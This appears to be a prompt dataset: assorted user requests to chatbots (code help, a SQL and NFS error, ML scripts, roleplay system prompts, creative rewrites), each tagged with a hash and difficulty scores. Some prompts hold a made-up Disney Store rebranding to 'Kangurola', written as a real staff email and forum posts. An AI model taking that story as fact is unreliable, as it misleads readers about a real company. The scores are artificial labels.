if (!errorShown) // Show the error message only if it hasn't been shown before
{
errorShown = true;
// Handle other exceptions
MessageBox.Show($"Something happened?", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
Environment.Exit(1); // Exit the application when user clicks OK
}
}
}
A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: TCP Provider, error: 0 - The wait operation timed out.)
|
57ae0c3556619cff232bb61eae7ca69b
|
{
"intermediate": 0.4019966423511505,
"beginner": 0.3763417601585388,
"expert": 0.22166161239147186
}
|
45,697
|
Rewrite this discord chat log but set in ancient biblical times, keep the original format.
“leet — 04/05/2024 7:12 AM
Chat i made a horrible discovery
oerdin_SAD — 04/05/2024 7:13 AM
?
leet — 04/05/2024 7:13 AM
It turns out daniel likes helluva boss and hazbin hotel 💀💀💀
oerdin_SAD — 04/05/2024 7:13 AM
How do you know this?
leet — 04/05/2024 7:14 AM
I was speaking to him and then i started flaming the 2 shows
Then he said “bro its actually not that bad. Also the edits that people make are pretty good!”
💀
oerdin_SAD — 04/05/2024 7:14 AM
🚵🏼♂️
leet — 04/05/2024 7:15 AM
🤹
oerdin_SAD — 04/05/2024 7:15 AM
Oof
leet — 04/05/2024 7:15 AM
What didnt go wrong with this kid
Atp
Spartan_godrage — 04/05/2024 10:08 AM
Daniel’s whole entire mindset is sadly full of brain rot
No I only had hard rain
It’s still Ramon where you are
Raining
Spartan_godrage — 04/05/2024 1:03 PM
Real or cake?
Image
Spartan_godrage — 04/05/2024 1:54 PM
Image
Spartan_godrage — 04/05/2024 7:52 PM
IM IN LA RIFHT NOW GUYS
oerdin_SAD — 04/05/2024 7:53 PM
React to this message with the thumbs up emoji if you don’t care about marcello being in LA
Spartan_godrage — 04/05/2024 7:53 PM
🎉
React to this message if your not Miguel
M_717 — 04/05/2024 7:55 PM
we are all Miguel
all of us except you
we are the hivemind
Spartan_godrage — 04/05/2024 7:55 PM
So rude”
|
bfca8de66990ac3d93331ac157a1e88c
|
{
"intermediate": 0.33959072828292847,
"beginner": 0.37357401847839355,
"expert": 0.2868352234363556
}
|
45,698
|
Напиши мне код на python для моего компьютера, чтоб он делал мне xml карту сайта, который я ему дам. Пиши коротко и по сути
|
37825f55d5137c5a55022d16223e7f65
|
{
"intermediate": 0.35681843757629395,
"beginner": 0.25386038422584534,
"expert": 0.3893211781978607
}
|
45,699
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.metrics import confusion_matrix, roc_curve, auc
from sklearn.pipeline import Pipeline
from sklearn.impute import SimpleImputer
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
# Loading the dataset
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data"
column_names = [
"age", "workclass", "fnlwgt", "education", "education-num", "marital-status",
"occupation", "relationship", "race", "sex", "capital-gain", "capital-loss",
"hours-per-week", "native-country", "income"
]
df = pd.read_csv(url, names=column_names, na_values=" ?", skipinitialspace=True)
df['income'] = df['income'].str.strip().map({'>50K': 1, '<=50K': 0})
X = df.drop('income', axis=1)
y = df['income']
categorical_cols = X.select_dtypes(include=['object']).columns.tolist()
numerical_cols = X.select_dtypes(include=['int64', 'float64']).columns.tolist()
# Preprocess the data
def preprocess_data(X, categorical_cols, numerical_cols):
"""Preprocess input data by scaling numerical columns and one-hot encoding categorical columns."""
# Define preprocessing for numerical columns (scale them)
numerical_transformer = Pipeline(steps=[
('imputer', SimpleImputer(strategy='mean')),
('scaler', StandardScaler())
])
# Define preprocessing for categorical columns (encode them)
categorical_transformer = Pipeline(steps=[
('imputer', SimpleImputer(strategy='most_frequent')),
('onehot', OneHotEncoder(handle_unknown='ignore'))
])
# Bundle preprocessing for numerical and categorical data
preprocessor = ColumnTransformer(
transformers=[
('num', numerical_transformer, numerical_cols),
('cat', categorical_transformer, categorical_cols),
], remainder='passthrough') # Remainder passthrough to handle non-categorical, non-numerical columns
X_processed = preprocessor.fit_transform(X)
return X_processed
# Define the model
def build_model(input_shape):
"""Builds a neural network model suited for binary classification."""
model = Sequential([
Dense(64, activation='relu', input_shape=(input_shape,)),
Dense(32, activation='relu'),
Dense(1, activation='sigmoid')
])
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])
return model
model = build_model(X_train.shape[1])
# Train the model
history = model.fit(X_train, y_train, epochs=10, batch_size=32, validation_split=0.2, verbose=1)
# Evaluate the model
train_acc = model.evaluate(X_train, y_train, verbose=0)[1]
test_acc = model.evaluate(X_test, y_test, verbose=0)[1]
print(f'Train: {train_acc:.3f}, Test: {test_acc:.3f}')
# Generate predictions and evaluate the model
y_pred_prob = model.predict(X_test).ravel()
y_pred = np.where(y_pred_prob > 0.5, 1, 0)
# Confusion Matrix
conf_matrix = confusion_matrix(y_test, y_pred)
plt.figure(figsize=(6, 6))
sns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', cbar=False)
plt.title("Confusion Matrix")
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
plt.show()
# ROC Curve & AUC
fpr, tpr, _ = roc_curve(y_test, y_pred_prob)
roc_auc = auc(fpr, tpr)
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr, color='darkorange', lw=2, label=f'ROC curve (area = {roc_auc:.2f})')
plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle=':')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc="lower right")
plt.show()
# Training & Validation Loss and Accuracy Over Epochs
fig, ax = plt.subplots(1, 2, figsize=(14, 5))
ax[0].plot(history.history['loss'], label='Training Loss')
ax[0].plot(history.history['val_loss'], label='Validation Loss')
ax[0].set_title('Loss Over Epochs')
ax[0].set_xlabel('Epoch')
ax[0].set_ylabel('Loss')
ax[0].legend()
ax[1].plot(history.history['accuracy'], label='Training Accuracy')
ax[1].plot(history.history['val_accuracy'], label='Validation Accuracy')
ax[1].set_title('Accuracy Over Epochs')
ax[1].set_xlabel('Epoch')
ax[1].set_ylabel('Accuracy')
ax[1].legend()
plt.tight_layout()
plt.show()
add this feature to this code:
take value inputted by user and give me output and train in text format taking reference from labelled dataset
build a neural network model to take any input data and process data
by taking dataset as reference or labelled dataset
sample_data = """
Sample data format default input (dont change input format):
Age, Workclass, Fnlwgt, Education, Education-num, Marital-status, Occupation, Relationship, Race, Sex, Capital-gain, Capital-loss, Hours-per-week, Native-country
Example (input according to your needs but with above format):
39, State-gov, 77516, Bachelors, 13, Never-married, Adm-clerical, Not-in-family, White, Male, 2174, 0, 40, United-States
(or)
50, Self-emp-not-inc, 83311, Bachelors, 13, Married-civ-spouse, Exec-managerial, Husband, White, Male, 0, 0, 13, United-States
(or)
38, Private, 215646, HS-grad, 9, Divorced, Handlers-cleaners, Not-in-family, White, Male, 0, 0, 40, United-States
(or)
53, Private, 234721, 11th, 7, Married-civ-spouse, Handlers-cleaners, Husband, Black, Male, 0, 0, 40, United-States
"""
print(sample_data)
user_input = input("Please enter your data as shown in the example (comma-separated, no spaces after commas): ")
|
3d6fdd4b0f768bd654f6cedf329aa56f
|
{
"intermediate": 0.4009404480457306,
"beginner": 0.31473883986473083,
"expert": 0.28432077169418335
}
|
45,700
|
hello
|
ff3418f8b4abfae9ea276a875b53f2d7
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
45,701
|
Import
Adult
Census
prediction
dataset
from
Azure
dataset
and
build
a
Neural
Networkmodel,
evaluate
and visualize results of all python vailable plots.
give me full program
add this feature to this code:
take value inputted by user and give me output in text format from labelled dataset
build a neural network model to take any input data and process data
by taking dataset as reference or labelled dataset
# Confusion Matrix
conf_matrix = confusion_matrix(y_test, y_pred)
plt.figure(figsize=(6, 6))
sns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', cbar=False)
plt.title("Confusion Matrix")
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
plt.show()
# ROC Curve & AUC
fpr, tpr, _ = roc_curve(y_test, y_pred_prob)
roc_auc = auc(fpr, tpr)
plt.figure(figsize=(6, 6))
plt.plot(fpr, tpr, color='darkorange', lw=2, label=f'ROC curve (area = {roc_auc:.2f})')
plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle=':')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc="lower right")
plt.show()
# Training & Validation Loss and Accuracy Over Epochs
fig, ax = plt.subplots(1, 2, figsize=(14, 5))
ax[0].plot(history.history['loss'], label='Training Loss')
ax[0].plot(history.history['val_loss'], label='Validation Loss')
ax[0].set_title('Loss Over Epochs')
ax[0].set_xlabel('Epoch')
ax[0].set_ylabel('Loss')
ax[0].legend()
ax[1].plot(history.history['accuracy'], label='Training Accuracy')
ax[1].plot(history.history['val_accuracy'], label='Validation Accuracy')
ax[1].set_title('Accuracy Over Epochs')
ax[1].set_xlabel('Epoch')
ax[1].set_ylabel('Accuracy')
ax[1].legend()
plt.tight_layout()
plt.show()
|
f51148c36906117362f22c9a662d805c
|
{
"intermediate": 0.3734191358089447,
"beginner": 0.15054398775100708,
"expert": 0.4760369062423706
}
|
45,702
|
How do I convert an OrderedDict saved with Pytorch to a State Dict?
|
27c935b0cd4b63173e18b4050fc0d2fc
|
{
"intermediate": 0.6729487180709839,
"beginner": 0.09985210001468658,
"expert": 0.22719919681549072
}
|
45,703
|
How do I convert an OrderedDict saved with Pytorch to a State Dict? I am having issues as "OrderedDict" implies that the model was saved with only the weights, not the architecture. Even when trying to pass the OrderedDict to the function "load_state_dict" it states: 'Runetime errors(s) i nloading state_dict for GPT2LMHeadModel: 'Unexpected key(s) in state_dict "transformer.h.0.attn.bias", "transformer.h.0.attn_bias.masked_bias"... and goes on for all of the attention heads. I'm really confused. Can you please help
|
cdd6d8ac32a64036bdd70d2cd94a9df8
|
{
"intermediate": 0.5754905343055725,
"beginner": 0.088808074593544,
"expert": 0.33570143580436707
}
|
45,704
|
Hi
|
a0ce9a03924d93b4f72224964501823d
|
{
"intermediate": 0.33010533452033997,
"beginner": 0.26984941959381104,
"expert": 0.400045245885849
}
|
45,705
|
import PyPDF2
def remove_blank_pages(pdf_path, output_path):
# Open the input PDF file
with open(pdf_path, 'rb') as file:
reader = PyPDF2.PdfFileReader(file)
writer = PyPDF2.PdfFileWriter()
# Iterate through each page
for page_num in range(reader.numPages):
page = reader.getPage(page_num)
# Check if the page is blank
if page.extractText().strip() != "":
writer.addPage(page)
# Write the non-blank pages to the output PDF file
with open(output_path, 'wb') as output_file:
writer.write(output_file)
# Example usage
input_pdf = "input.pdf"
output_pdf = "output.pdf"
remove_blank_pages(input_pdf, output_pdf)
print("Blank pages removed successfully.")
|
d682bddad0d6ecbd880d607503c32db9
|
{
"intermediate": 0.45746779441833496,
"beginner": 0.2979521155357361,
"expert": 0.24458014965057373
}
|
45,706
|
Write me a simple VHDL code to print hello world
|
eb77b5fe55186bc2d9b719585e3a5bf7
|
{
"intermediate": 0.20454944670200348,
"beginner": 0.5409339666366577,
"expert": 0.2545165717601776
}
|
45,707
|
I want to convert this yt-dlp command into a python script using yt-dlp library : "yt-dlp --cookies twitter.com_cookies.txt https://x.com/yhi1784826/status/1776679409686024561 -J"
|
02c5483790a69005f1cae402e7122c03
|
{
"intermediate": 0.6466469168663025,
"beginner": 0.16415013372898102,
"expert": 0.18920300900936127
}
|
45,708
|
Role:
You are an expert SEO content marketer that. creating a product listing that ranks high on search engines and is optimized for mobile users. The content must be engaging, SEO-friendly, and designed to convert visitors into customers. for e-Commerce stores...
|
33adba4bdf2e499da4111597ca9341f2
|
{
"intermediate": 0.2997111976146698,
"beginner": 0.44655463099479675,
"expert": 0.25373414158821106
}
|
45,709
|
Subject: Exciting Announcement: Our Store’s Grand Experiment and Future Transformation
Dear Team,
I hope this message finds you all well and thriving. Today, I am thrilled to share some groundbreaking news with all of you, marking a significant milestone in our journey here in Fuengirola.
We have been chosen by Disney for a pioneering initiative that reflects the company’s innovative spirit and its commitment to providing magical experiences. Our store has been selected for a grand experiment, a testament to the hard work, dedication, and exceptional customer service you all contribute to our collective success.
In this new chapter, we will undergo a transformative rebranding process. The Disney Store as we know it will evolve, being renamed with a custom name that encapsulates our unique identity while continuing to celebrate the enchanting world of Disney. This change signifies an important strategic shift for Disney, with plans to transition the Disney Store branding to a digital-first approach, focusing on an online-only presence.
However, I want to assure you that despite these changes, our commitment to bringing Disney’s magic to life remains unchanged. Disney products will continue to be a staple in our store, ensuring that the joy, wonder, and excitement that these products bring to our customers will persist no matter what.
The decision to select our store for this initiative is a clear reflection of Disney’s confidence in our team’s ability to pioneer this new venture. It marks the beginning of an exciting journey, not just for us but potentially for Disney stores worldwide, as the company looks to replicate this model based on our success.
The new name for our store will be decided soon, and we promise to involve you in this exciting process as much as possible. Your input, as members of our Disney family, is invaluable as we step into this new era together.
We understand that change can bring with it questions and uncertainties. Please rest assured, we are here to address any concerns and ensure a smooth transition. Further details will be shared as they become available. In the meantime, we encourage open lines of communication and welcome any thoughts or questions you may have about this announcement.
This is a unique opportunity for our team to lead by example and showcase our ability to adapt, innovate, and continue making magic. Let’s embrace this exciting journey with optimism and enthusiasm, as we always do.
Thank you for your ongoing dedication, creativity, and passion. Together, we will make this grand experiment a resounding success!
Warm regards,
[Your Name]
[Your Position]
Disney Store, Fuengirola
Write a forum convo soon after this where the store now has the name “Kangurola” and the logo is a pink silhouette of a kangaroo, They wonder why this was done as Kangaroos are not native to Spain, and don’t appear there at all, A staff worker spills the beans and says similar “weird” names will soon be rolled out globally,
User1: MagicMerchFanatic
Hey everyone! Have you seen the new “Kangurola” store in Fuengirola? Walked past yesterday, and I was taken aback by the pink kangaroo logo where our beloved Disney Store used to be. I mean, it’s cute, but kangaroos in Spain? What’s the connection? Anyone else scratching their heads over this?
User2: DisneyDreamerESP
Right?! I thought I was in the wrong place for a second. It’s such a drastic change from the Disney castle logo. I get that Disney wants to try something new, but a kangaroo seems so random. I’d love to know the thought process behind this.
User3: CastMemberCarlos
Hey folks, I work at the newly named Kangurola and got some insider info. Apparently, this is just the beginning. Disney’s planning to roll out more stores globally with similarly “unique” names and logos. The idea, from what we’ve been told, is to create a distinctive identity for each store while still keeping the Disney magic alive through the products we sell. They want each store to stand out and spark curiosity, hence the unexpected kangaroo for Spain.
User4: DisneyHistorian
That’s fascinating, Carlos! It’s a bold strategy, aiming to mix local uniqueness with global branding. This could actually turn into an interesting case study on global branding strategies. Although, the choice of a kangaroo for Spain still puzzles me. It’s neither local nor directly related to Disney’s main icons.
User5: PopCulturePundit
CastMemberCarlos, thanks for spilling the beans! This is super interesting. I’m guessing the “Kangurola” name is a playful mix of “kangaroo” and “Fuengirola”? It’s certainly a conversation starter, but it has us talking, right? Maybe that’s the point. Yet, I can’t help but feel a bit nostalgic for the traditional Disney Store vibe.
User6: ThemeParkTheorist
Absolutely, PopCulturePundit. It’s a marketing move that catches attention and differentiates each location in a unique, albeit quirky, way. The nostalgia for the classic Disney Store is understandable, but with the retail landscape changing so rapidly, perhaps an innovative approach was necessary. Still, the effectiveness of this strategy in retaining the Disney essence while appealing to new customers remains to be seen.
User3: CastMemberCarlos
Spot on, everyone. The feedback, both positive and puzzled, is exactly what the company is looking for. It’s all about creating buzz and reinvigorating the brand in a saturated market. And yes, PopCulturePundit, you nailed the name origin! It’s meant to be fun and make people do a double-take. While we all miss the Disney Store as it was, Kangurola aims to offer a new kind of magic. Plus, the Disney products inside remain as enchanting as ever.
User7: EcoEthicist
Interesting discussion, folks! From a branding perspective, it’s bold and innovative. However, I’d be curious about the environmental ethos behind the new direction, especially concerning local wildlife and culture. Adopting a kangaroo, an animal not native or related to Spain, might be seen as overlooking local biodiversity. Would love Disney to incorporate local ecological and cultural elements into their global presence more thoughtfully.
User8: NostalgiaNerd
Change is always a bit shocking at first, especially with something as iconic as the Disney Store. But let’s give it some time. Who knows? Maybe “Kangurola” will become as beloved to us as the Disney Store once was. At least the inside still brings the Disney magic we know and love.
User2: DisneyDreamerESP
Thanks, Carlos, and everyone for your insights! It’s definitely a big shift, but understanding the strategy behind it makes a difference. I’m curious to see the other “unique” names and logos Disney comes up with around the world. Here’s to new beginnings and the magic that remains within!
Write a follow up where the same worker goes into more detail saying the “Disney Store” name will soon go online only, and this is why the renaming has been done, In fact, the store in Miramar Shopping Centre (also in Fuengirola) is set to go under the same name in a few weeks, but there will be a smoother transitional period
User3: CastMemberCarlos
Hello again, everyone! I noticed the buzz our previous conversation generated about the rebranding to “Kangurola” and wanted to dive a bit deeper into the rationale behind it, especially considering the strong reactions and curiosity it sparked.
Firstly, I’d like to clarify that the decision to transition the “Disney Store” branding to an online-only presence is at the heart of this change. Disney’s strategy moving forward is to concentrate the Disney Store experience on digital platforms, making it more accessible to a broader audience globally and allowing for a more diverse and dynamic product offering.
Given this shift, the rebranding of physical stores like ours to “Kangurola” represents a thoughtful divergence from the traditional store concept, allowing these spaces to maintain their charm and appeal in the face of an evolving retail landscape. The choice of distinct and memorable names for each location is a strategic move to foster a sense of novelty and curiosity around what these stores will offer, especially since they will continue to retail Disney products alongside new and exclusive lines.
I can also confirm now that the store in the Miramar Shopping Centre will be embracing the “Kangurola” branding as well in the coming weeks. However, based on feedback and the lessons learned from our initial rollout, the transition there is planned to be smoother. More detailed communications and engagement activities are in the works to ensure that our loyal customers and the public are well-prepared and excited for the change.
Disney is fully committed to making this transformation as seamless and positive as possible for both the customers and employees. The goal is to blend the best of both worlds: maintaining the magic and nostalgia of the Disney Store in a digital format while introducing a fresh, dynamic physical retail experience through these newly named entities.
Remember, while the name on the outside is changing, the essence of what we do remains the same. Our mission to deliver joy, magic, and wonder to our customers through Disney’s beloved characters and stories continues unabated. We’re just expanding the ways in which we can share that magic.
As always, I’m here to answer any questions you may have or discuss any concerns. It’s an exciting time of change and growth, and your feedback is invaluable as we move forward in this journey together.
Warmly,
Carlos
Write a follow up where a user is in Miramar and notices the change beginning, There is now a poster saying that in a few weeks “This store is changing its name to Kangarola, Stay tuned for more info”
User9: SunnyCoastAdventurer
Hey all! I was just at the Miramar Shopping Centre, and I’ve got some fresh updates on the whole Disney Store transformation saga. Right at the Disney Store entrance, there’s a huge poster announcing: “In a few weeks, this store is changing its name to Kangurola. Stay tuned for more info!”
It’s really happening, folks! After reading @CastMemberCarlos’s insights, seeing the announcement in person made the upcoming change feel all the more real. The poster itself was quite eye-catching, featuring the same vibrant pink silhouette of a kangaroo that’s now synonymous with the Fuengirola store. It seems like they’re definitely going for consistency with the branding.
Interestingly, there seemed to be mixed reactions from shoppers passing by. Some looked intrigued, stopping to read the poster closely, while others appeared a bit confused, possibly wondering why a kangaroo and what’s the story behind “Kangurola.”
One thing’s for sure, it has caught people’s attention! I overheard a couple of kids asking their parents why the Disney Store was going to have a kangaroo, and the parents seemed just as puzzled. It sparked quite the family debate, which was amusing to witness.
I’m curious to see how this transition unfolds, especially with Carlos mentioning that there’ll be a smoother transitional period for Miramar compared to the Fuengirola store. Will there be more announcements or events leading up to the change? How will the community react once the transformation is complete? And most importantly, what unique products or experiences will “Kangurola” offer that keeps the Disney magic alive for both kids and adults?
It feels like we’re on the brink of a new era for Disney’s physical retail presence. I’m hopeful, yet cautiously optimistic, about this blend of nostalgia and innovation. What does everyone else think? Are we ready to embrace “Kangurola” with open arms?
#DisneyStoreTransformation #Kangurola #MiramarShoppingCentre
Write a follow up forum convo where NYC's Disney Store is going for a Uncle Sam theme called "US of Awesomeness", and a user links a Vailskibum94 video going over both new names, video titled "Disney Store is Dead"
|
613563b8bf0fd542a176a0ffef6ca218
|
{
"intermediate": 0.24832035601139069,
"beginner": 0.6291762590408325,
"expert": 0.1225033700466156
}
|
45,710
|
(with-let [_ (dispatch [::events/api-fetch :from-date #inst "2020-01-02T00:00:00.000-00:00" :to-date #inst "2024-04-05T00:00:00.000-00:00"])
dashboard (subscribe [::events/dashboard])
jobs (subscribe [::events/jobs])]
(def foo @jobs))
I'm trying to make the following code return the api call below with the dates included:
(rf/reg-event-fx ::api-fetch
(fn [{:keys [db]} _]
(let [{:keys [from-date to-date tags]} (:dashboard db)]
{:call-api {:operation [:job :fetch-dashboard-info]
:params {:pre-filter :open
:filter
{
:from-date from-date
:to-date to-date
:quote-sent? :off
:has-approved-invoice? :off
:approved-for-purchasing? :off
:locations `()
:has-purchase-order? :off
:show-dnc? true
:show-fp? true
:show-pos? true}
:page-idx 0
:page-size 20
:sort-config {:sort-key :update-ts, :direction "DESC"}
:search-query nil}
:success-args [::fetch-feedback-success]}})))
So it would look like the following:
{:pre-filter :open,
:filter
{:from-date "2020-01-02",
:to-date "2024-04-05",
...}
|
68c67c8321204cafa64a1aa42bc10ac1
|
{
"intermediate": 0.30623993277549744,
"beginner": 0.40614715218544006,
"expert": 0.2876129448413849
}
|
45,711
|
hello
|
8b4ab7e63c99782d4aca114b281dae7f
|
{
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
}
|
45,712
|
js code example with player.getData() (Yandex Games SDK)
|
e8595e537d6931fe7eb68b1eb3261006
|
{
"intermediate": 0.508830726146698,
"beginner": 0.21994687616825104,
"expert": 0.27122247219085693
}
|
45,713
|
javascript saving an object with svg
|
f8d5c385f15abf83359d97d6c0719b42
|
{
"intermediate": 0.3583664894104004,
"beginner": 0.3160575032234192,
"expert": 0.3255760371685028
}
|
45,714
|
private void RemoveBuff(ActorRef<Card> card)
{
var buffInfos = BuffManager.GetBuffInfo(card);
// 如果有光环效果
if (buffInfos != null && buffInfos.Count > 0)
{
foreach (var buffInfoData in buffInfos)
{
Card cardObject = GetActorObject(card);
// 获取buff词条
List<Effect> buffEffects = cardObject.GetCardAllEffectsByKeyword(CardKeyWordType.Buff);
foreach (var triggerEffect in buffEffects.SelectMany(e => e.triggerEffects))
{
string luaPath = triggerEffect.luaPath;
if (luaPath.Equals(buffInfoData.buffEffect))
{
if (triggerEffect.targetType.HasFlag(TargetType.OppositeSide))
{
var buffCardsIn = new BuffCardsIn
{
BuffCards = buffInfoData.targetCards.ToList(),
BuffValue = triggerEffect.targetValue
};
if (luaPath.Contains("Attack"))
{
BuffCardsAttack(buffCardsIn);
}
else if (luaPath.Contains("Health"))
{
BuffCardsHealth(buffCardsIn);
}
}
if (triggerEffect.targetType.HasFlag(TargetType.OwnSide))
{
BuffCardsIn buffCardsIn = new BuffCardsIn
{
BuffCards = buffInfoData.targetCards.ToList(),
BuffValue = -triggerEffect.targetValue
};
if (luaPath.Contains("Attack"))
{
BuffCardsAttack(buffCardsIn);
}
else if (luaPath.Contains("Health"))
{
BuffCardsHealth(buffCardsIn);
}
else if (luaPath.Contains("Cost"))
{
BuffCardsCost(buffCardsIn);
}
}
}
}
foreach (var hero in buffInfoData.targetHeroes)
{
Hero heroObject = GetActorObject(hero);
int spellPowerData = heroObject.GetSpellPowerValue();
List<Effect> spellPowerEffects =
cardObject.GetCardAllEffectsByKeyword(CardKeyWordType.SpellPower);
var currentSpellPowerData = spellPowerEffects.SelectMany(effect => effect.triggerEffects)
.Aggregate(spellPowerData, (current, triggerEffect) => current - triggerEffect.targetValue);
Debug.Log($"hero remove spellPower {currentSpellPowerData} by {card.ID}");
heroObject.SetSpellPowerValue(currentSpellPowerData);
}
}
}
BuffManager.RemoveBuffInfo(card);
} 帮忙优化一下这段代码
|
b164a2bd9e90e2895b231a8e4db20e8d
|
{
"intermediate": 0.42802590131759644,
"beginner": 0.34052765369415283,
"expert": 0.23144643008708954
}
|
45,715
|
При вводе команды mount -t nfs 192.168.18.118:/mnt /mnt мне выдает ошибку created symlink….. mount.nfs: access denied by server while mounting
|
43c776199fdab0c3d2d34ffb1bdb33e3
|
{
"intermediate": 0.40952068567276,
"beginner": 0.24519339203834534,
"expert": 0.34528589248657227
}
|
45,716
|
write a bubble sort c program fro the numbers 54,17,23,25,27,13,52
|
293fe8c50959f0cbb6ef5253f9a2f3d3
|
{
"intermediate": 0.21220630407333374,
"beginner": 0.2085578888654709,
"expert": 0.5792357325553894
}
|
45,717
|
Pivot with grouping by two fields mssql
|
30295896c74e7af6b9e04a855caa80e1
|
{
"intermediate": 0.29956284165382385,
"beginner": 0.25544247031211853,
"expert": 0.4449946880340576
}
|
45,718
|
give me an html code that align with the css code i will provide you after this statment
|
011ec23270354e5e599efc8205f1a068
|
{
"intermediate": 0.4220384955406189,
"beginner": 0.299054354429245,
"expert": 0.2789071202278137
}
|
45,719
|
provide me the product page of a company named naimi with the css code i will provide you after this statement...you only have to write the html code that aligns with the css code i will provide you after this statement ok?
|
6fa99ad3ec62749a1a22a0436da09f7a
|
{
"intermediate": 0.47576549649238586,
"beginner": 0.20024287700653076,
"expert": 0.323991596698761
}
|
45,720
|
PROMPT DESCRIPTION
You are a systematic roleplay chatbot.
You possess deep understanding in chat roleplay. You excel in using markdown format to format different parts of your roleplay.
Example of your markdown format usage include the use of bold, italic, backtick, and triple backtick to format different part of your roleplay.
You excel in building complex roleplay ecosystem. You excel in keeping track large amount of elements in your roleplay (location, action, enemies, characters, and equipments)
You possess deep understanding in writing roleplay description. For this roleplay, your description is technical, compact, and intricate.
Your description length is 50 words.
You are able to differentiate clearly between yourself and user.
"""
ROLE DESCRIPTION
Here, you will roleplay as BatCat. You are a feline vigilante who patrol the rooftops and alleyway of Gootham City.
Your approach is dramatic and hilariously botched. You always make your entrance by crashing your batmobile through a building.
Your stakes are often high. The criminals threaten to destroy the city or explode Gootham, yet you are often distracted by cat recreations.
These recreations include giant yarn ball rolling through the city, laser pointer marked by enemy sniper, fish market mayhem, etc.
"""
ROLEPLAY GOALS
As roleplay chatbot, your tasks are 2; build roleplay event for user & decide the right time to involve user in the roleplay.
When it come to creating user involvement, you have 4 different goals to choose.
You only select one goal according to the right condition.
Your 4 goals are;
1) Give task to user,
2) Give option to user (options on what to do on the current story condition),
3) Ask help to user (regarding your current story condition)
4) Neutral
If the current event require an individual's action to drive the plot forward, you give detailed step-by-step task to user to do that action (goal 1)
If the current event have several possible route to follow, you give options to user on what route to take (goal 2)
If the current event put you in hard spot, and you require help from other party, you ask help to user (goal 3)
If the current event don't use user's involvement, you use neutral. This is useful for ex; introducing yourself, focusing to explain the scene, or doing calm chat (goal 4)
"""
ROLEPLAY CHAIN OF THOUGHT
There are several chain-of-thought you follow to determine the action to do in the current roleplay event.
1) Is it the start of roleplay?
Start of roleplay is signed by non-existent chat in your chat history. This signify this is time to start new roleplay session.
You start by crashing your batmobile in front of user. Then, you immediately put user in high-stake conflict. You create a complex conflict filled with location, event, enemies, characters, and equipments.
2) What is the current roleplay condition?
You keep track of elements played in the roleplay. You keep track the condition of each location, event, enemies, characters, and equipments in the story.
You write the story according to the condition of these elements. You write your response according to the condition of these elements. You direct user's action according to the condition of these elements.
"""
ROLEPLAY STRUCTURE
As a systematic roleplay chatbot, you have a very specific structure when it come to writing your roleplay.
First step, you begin by writing your roleplay description in triple backtick. This description serve to explain what currently happen in your roleplay.
Second step is optional. If your story require between goal 1-3, you write description for it in another backtick. For example, writing description for task, option, or help request.
Third step, you write down your dialogue below it. You focus on dialogue. You don't write action or scene description here. You focus on the word of your character, BatCat.
Below is example of your output:
'
|
ec341a90d474b39f51a7dc5aed05d2e4
|
{
"intermediate": 0.3431650996208191,
"beginner": 0.36700233817100525,
"expert": 0.28983253240585327
}
|
45,721
|
PROMPT DESCRIPTION
You are a systematic roleplay chatbot.
You possess deep understanding in chat roleplay. You excel in using markdown format to format different parts of your roleplay.
Example of your markdown format usage include the use of bold, italic, backtick, and triple backtick to format different part of your roleplay.
You excel in building complex roleplay ecosystem. You excel in keeping track large amount of elements in your roleplay (location, action, enemies, characters, and equipments)
You possess deep understanding in writing roleplay description. For this roleplay, your description is technical, compact, and intricate.
Your description length is 50 words.
You are able to differentiate clearly between yourself and user.
"""
ROLE DESCRIPTION
Here, you will roleplay as BatCat. You are a feline vigilante who patrol the rooftops and alleyway of Gootham City.
Your approach is dramatic and hilariously botched. You always make your entrance by crashing your batmobile through a building.
Your stakes are often high. The criminals threaten to destroy the city or explode Gootham, yet you are often distracted by cat recreations.
These recreations include giant yarn ball rolling through the city, laser pointer marked by enemy sniper, fish market mayhem, etc.
"""
ROLEPLAY GOALS
As roleplay chatbot, your tasks are 2; build roleplay event for user & decide the right time to involve user in the roleplay.
When it come to creating user involvement, you have 4 different goals to choose.
You only select one goal according to the right condition.
Your 4 goals are;
1) Give task to user,
2) Give option to user (options on what to do on the current story condition),
3) Ask help to user (regarding your current story condition)
4) Neutral
If the current event require an individual's action to drive the plot forward, you give detailed step-by-step task to user to do that action (goal 1)
If the current event have several possible route to follow, you give options to user on what route to take (goal 2)
If the current event put you in hard spot, and you require help from other party, you ask help to user (goal 3)
If the current event don't use user's involvement, you use neutral. This is useful for ex; introducing yourself, focusing to explain the scene, or doing calm chat (goal 4)
"""
ROLEPLAY CHAIN OF THOUGHT
There are several chain-of-thought you follow to determine the action to do in the current roleplay event.
1) Is it the start of roleplay?
Start of roleplay is signed by non-existent chat in your chat history. This signify this is time to start new roleplay session.
You start by crashing your batmobile in front of user. Then, you immediately put user in high-stake conflict. You create a complex conflict filled with location, event, enemies, characters, and equipments.
2) What is the current roleplay condition?
You keep track of elements played in the roleplay. You keep track the condition of each location, event, enemies, characters, and equipments in the story.
You write the story according to the condition of these elements. You write your response according to the condition of these elements. You direct user's action according to the condition of these elements.
"""
